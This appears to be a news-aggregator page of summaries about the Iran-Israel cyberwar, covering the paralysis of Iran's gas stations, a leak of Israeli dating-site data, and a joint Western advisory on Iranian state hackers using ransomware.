Iranians couldn't buy gas. Israelis found their intimate dating details posted online. The Iran-Israel shadow war is now hitting ordinary citizens. From a report: Millions of ordinary people in Iran and Israel recently found themselves caught in the crossfire of a cyberwar between their countries. In Tehran, a dentist drove around for hours in search of gasoline, waiting in long lines at four gas stations only to come away empty. In Tel Aviv, a well-known broadcaster panicked as the intimate details of his sex life, and those of hundreds of thousands of others stolen from an L.G.B.T.Q. dating site, were uploaded on social media. For years, Israel and Iran have engaged in a covert war, by land, sea, air and computer, but the targets have usually been military or government related. Now, the cyberwar has widened to target civilians on a large scale. In recent weeks, a cyberattack on Iran's nationwide fuel distribution system paralyzed the country's 4,300 gas stations; it took 12 days for service to be fully restored.

That attack was attributed to Israel by two U.S. defense officials, who spoke on the condition of anonymity to discuss confidential intelligence assessments. It was followed days later by cyberattacks in Israel against a major medical facility and a popular L.G.B.T.Q. dating site, attacks Israeli officials have attributed to Iran. The escalation comes as American authorities have warned of Iranian attempts to hack the computer networks of hospitals and other critical infrastructure in the United States. As hopes fade for a diplomatic resurrection of the Iranian nuclear agreement, such attacks are only likely to proliferate. Hacks have been seeping into civilian arenas for months. Iran's national railroad was attacked in July, but that relatively unsophisticated hack may not have been Israeli. And Iran is accused of making a failed attack on Israel's water system last year. The latest attacks are thought to be the first to do widespread harm to large numbers of civilians. Nondefense computer networks are generally less secure than those tied to state security assets.

Security

US Says Iran-backed Hackers Are Now Targeting Organizations With Ransomware (techcrunch.com) 18

The U.S. government, along with counterparts in Australia and the U.K., has warned that Iranian state-backed hackers are targeting U.S. organizations in critical infrastructure sectors -- in some cases with ransomware. From a report: The rare warning linking Iran with ransomware landed in a joint advisory Wednesday, issued by the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), the Australian Cyber Security Centre (ACSC), and the U.K.'s National Cyber Security Centre (NCSC). The advisory said that Iran-backed attackers have been exploiting Fortinet vulnerabilities since at least March and a Microsoft Exchange ProxyShell vulnerability since October to gain access to U.S. critical infrastructure organizations in the transport and public health sectors, as well as organizations in Australia. The aim of the hackers is ultimately to leverage this access for follow-on operations such as data exfiltration, extortion and ransomware deployment. In May this year, for example, the hackers abused Fortigate gear to access a web server hosting the domain for a U.S. municipal government. The following month, CISA and the FBI observed the hackers exploiting Fortinet vulnerabilities to access the networks of a U.S.-based hospital specializing in healthcare for children. The joint advisory has been released alongside a separate report from Microsoft on the evolution of Iranian APTs, which are "increasingly utilizing ransomware to either collect funds or disrupt their targets." In the report, Microsoft said it has been tracking six Iranian threat groups that have been deploying ransomware and exfiltrating data in attacks that started in September 2020.

Security

A Cyberattack Paralyzed Every Gas Station In Iran 36

Iran's president said Wednesday that a cyberattack which paralyzed every gas station in the Islamic Republic was designed to get "people angry by creating disorder and disruption," as long lines still snaked around the pumps a day after the incident began. NPR reports: Ebrahim Raisi's remarks stopped short of assigning blame for the attack, which rendered useless the government-issued electronic cards that many Iranians use to buy subsidized fuel at the pump. However, his remarks suggested that he and others in the theocracy believe anti-Iranian forces carried out the assault. "There should be serious readiness in the field of cyberwar and related bodies should not allow the enemy to follow their ominous aims to make problem in trend of people's life," Raisi said. No group has claimed responsibility for the attack that began Tuesday, though it bore similarities to another months earlier that seemed to directly challenge Iran's Supreme Leader Ayatollah Ali Khamenei as the country's economy buckles under American sanctions.

On Wednesday morning, IRNA quoted another official who claimed 80% of Iran's gas stations had begun selling fuel again. Associated Press journalists saw long lines at multiple gas stations in Tehran. One station had a line of 90 cars waiting for fuel. Those buying ended up having to pay at higher, unsubsidized prices. Tuesday's attack rendered useless the government-issued electronic cards that many Iranians use to buy subsidized fuel at the pump. The semiofficial ISNA news agency, which first called the incident a cyberattack, said it saw those trying to buy fuel with a government-issued card through the machines instead receiving a message reading "cyberattack 64411." While ISNA didn't acknowledge the number's significance, that number is associated with a hotline run through Khamenei's office that handles questions about Islamic law. ISNA later removed its reports, claiming that it too had been hacked. Such claims of hacking can come quickly when Iranian outlets publish news that angers the theocracy.
